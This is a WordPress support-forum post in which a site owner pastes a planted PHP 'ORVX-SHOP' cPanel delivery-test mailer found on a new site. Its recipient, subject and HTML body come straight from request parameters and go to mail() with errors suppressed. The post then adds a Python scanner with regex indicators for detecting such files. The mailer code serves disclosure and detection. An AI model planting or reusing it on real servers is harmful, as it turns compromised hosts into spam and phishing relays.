• Resolved CPKN

    (@cpkn)


    I found gibberish PHP files with code in my WordPress directory of a fresh website, in maintenance mode with Wordfence Premium:

    <?php
    error_reporting(0);
    $actual_linka = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
    $partsa = parse_url($actual_linka);

    $stra = $partsa['scheme'].'://'.$partsa['host'].$partsa['path'];
    $aler = '';
    $emall = isset($_REQUEST['email'])?$_REQUEST['email']:null;

    function hideEmailAddress($email)
    {
    $em = explode("@", $email);
    $name = implode("@", array_slice($em, 0, count($em) - 1));
    $len = floor(strlen($name) / 2);
    return substr($name, 0, $len) . str_repeat("*", $len) . "@" . end($em);
    }

    if (filter_var($emall, FILTER_VALIDATE_EMAIL)){
    $recipient = isset ($emall) ? $emall : null;
    $subject = isset ($_REQUEST["subject"]) ? $_REQUEST["subject"] : "Delivery Test from cPanel [$stra]";
    $message = isset ($_REQUEST["msg"]) ? $_REQUEST["msg"] : "If you see this msg this means that cPanel [$stra] Delivery is working good";
    $headers = "MIME-Version: 1.0" . "\r\n";
    $headers .= "Content-type: text/html; charset=iso-8859-1" . "\r\n";


    if(mail($recipient, $subject, $message, $headers))
    {
    $aler = '<div class="alert alert-success alert-dismissible fade show" role="alert" style="background: rgba(40, 199, 111, 0.2) !important;color: #28C76F !important;border-color: rgb(0 0 0 / 8%);border-radius: 10px;">

    <span>Test email sent to '.hideEmailAddress($emall).' Successfully</span>
    </div>';
    }
    else{
    $aler = '<div class="alert alert-danger alert-dismissible fade show" role="alert" style="background: rgba(234, 84, 85, 0.2) !important;
    color: #EA5455 !important;border-color: rgb(0 0 0 / 8%);border-radius: 10px;">

    <span>Test email Failed to '.hideEmailAddress($emall).'</span>
    </div>';
    }




    }

    echo '<html lang="en"><head>
    <title>' . $_SERVER['HTTP_HOST'] . ' - cPanel delivery test</title>
    <link rel="shortcut icon"" >
    <link rel="stylesheet" type="text/css" >

    <style>
    .orvx-auth {
    display: -webkit-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
    -webkit-flex-basis: 100%;
    -ms-flex-preferred-size: 100%;
    flex-basis: 100%;
    min-height: 100vh;
    min-height: calc(var(--vh, 1vh) * 100);
    width: 100%
    }

    .orvx-auth .auth-inner {
    width: 100%;
    position: relative
    }

    .orvx-auth.orvx-v1 {
    -webkit-box-align: center;
    -webkit-align-items: center;
    -ms-flex-align: center;
    align-items: center;
    -webkit-box-pack: center;
    -webkit-justify-content: center;
    -ms-flex-pack: center;
    justify-content: center;
    overflow: hidden
    }

    .orvx-auth.orvx-v1 .auth-inner:before {
    width: 244px;
    height: 243px;
    content:" ";
    position: absolute;
    top: -54px;
    left: -46px;
    background-image: url(data:image/png;base64,[base64 image data removed])
    }

    .orvx-auth.orvx-v1 .auth-inner:after {
    width: 272px;
    height: 272px;
    content:" ";
    position: absolute;
    bottom: -55px;
    right: -75px;
    background-image: url(data:image/png;base64,[base64 image data removed]);
    z-index: -1
    }

    @media (max-width:575.98px) {
    .orvx-auth.orvx-v1 .auth-inner:after,
    .orvx-auth.orvx-v1 .auth-inner:before {
    display: none
    }
    }



    .orvx-auth.orvx-v1 .auth-inner {
    max-width: 500px;

    }

    .orvx-auth .brand-logo {
    display: -webkit-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-pack: center;
    -webkit-justify-content: center;
    -ms-flex-pack: center;
    justify-content: center;
    margin: 1rem 0 2rem
    }

    .orvx-auth .brand-logo .brand-text {
    font-weight: 600
    }


    @media (min-width:1200px) {
    .orvx-auth.auth-v2 .auth-card {
    width: 400px
    }
    }
    </style>
    </head>

    <body style="
    color: #B4B7BD;
    background-color: #161D31;
    ">

    <div class="orvx-auth orvx-v1 px-2">
    <div class="auth-inner py-2">

    <div class="card mb-0" style="
    background-color: #283046;
    box-shadow: 0 4px 24px 0 rgb(34 41 47 / 24%);
    border-radius: 10px;
    ">

    <div class="card-body">
    <a target="_blank" style="
    color: #7367F0 !important;
    background-color: transparent;
    " class="brand-logo">

    <h2 class="brand-text text-primary ml-1" style="
    color: #7367F0 !important;
    background-color: transparent;
    ">ORVX-SHOP</h2>
    </a>
    '.$aler.'
    <h4 class="card-title mb-1">Delivery Test</h4>
    <p class="card-text mb-2">Tip: you can fast check delivery with this link directly <br><a href="'.$stra.'?email=youremail@domain.com">'. $stra.'?email=youremail@domain.com</a></p>
    <form method="post">
    <div class="form-group">
    <label class="form-label">Email</label>
    <input required="" type="email" class="form-control" name="email" placeholder="youremail@domain.com" autofocus="" style="
    border-color: #404656;
    background-color: #283046;
    color: #B4B7BD;
    ">
    <p class="card-text mb-2">Test email will be sent to this email address.</p>

    </div>

    <button type="submit" class="btn btn-lg float-right" style="border-color: #4839EB !important;background-color: #7367F0 !important;color: #FFFFFF;">Test</button>




    </form>


    </div>
    </div>

    </div>
    </div>
    </body></html>';
    exit;

    Given there is an imgur link to V for Vendetta and it has ORVX Shop, this has to be malicious. WF has not picked this up.
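The posted file is a request-driven mailer: the recipient, subject and body all come straight from `$_REQUEST` and are handed to `mail()`, with error output suppressed. The scanner below is an added triage example (not from the original post or from Wordfence) that walks a WordPress tree and scores PHP files against indicators taken from that script; the indicator weights and thresholds are a constructed heuristic.

```python
import os
import re

# Indicators drawn from the mailer script posted above. Weights are a
# constructed triage heuristic (assumption), not a Wordfence signature.
INDICATORS = [
    ("suppresses errors", re.compile(r"error_reporting\(\s*0\s*\)"), 1),
    ("recipient from request", re.compile(r"\$_(?:REQUEST|GET|POST)\[['\"]email['\"]\]"), 2),
    ("subject/body from request", re.compile(r"\$_(?:REQUEST|GET|POST)\[['\"](?:subject|msg)['\"]\]"), 2),
    # \b keeps WordPress's own wp_mail() calls from matching.
    ("calls raw mail()", re.compile(r"\bmail\s*\("), 2),
    ("cPanel delivery-test lure", re.compile(r"Delivery Test from cPanel|cPanel delivery test"), 3),
    ("ORVX branding", re.compile(r"ORVX", re.I), 3),
]

def score_php_source(src):
    """Return (score, [matched indicator names]) for one PHP source string."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(src)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits

def verdict(score):
    # Thresholds are part of the constructed scale; tune to your environment.
    if score >= 7:
        return "likely-mailer"
    if score >= 3:
        return "suspicious"
    return "clean"

def scan_directory(root):
    """Walk a WordPress tree and return (path, verdict, hits) for flagged PHP files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            score, hits = score_php_source(src)
            if score >= 3:
                findings.append((path, verdict(score), hits))
    return findings

# Constructed sample: the request-to-mail() skeleton of the posted file, HTML omitted.
SAMPLE = r'''<?php
error_reporting(0);
$emall = isset($_REQUEST['email'])?$_REQUEST['email']:null;
$subject = isset ($_REQUEST["subject"]) ? $_REQUEST["subject"] : "Delivery Test from cPanel [$stra]";
if (mail($emall, $subject, $_REQUEST["msg"], $headers)) { echo "ORVX-SHOP"; }
'''
```

Run `scan_directory("/path/to/wordpress")` against a site copy; core files calling `wp_mail()` score 0, while the posted mailer scores 13 and is reported as `likely-mailer`.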

Viewing 1 replies (of 1 total)
  • The topic ‘I Found Gibberish PHP with strange Code’ is closed to new replies.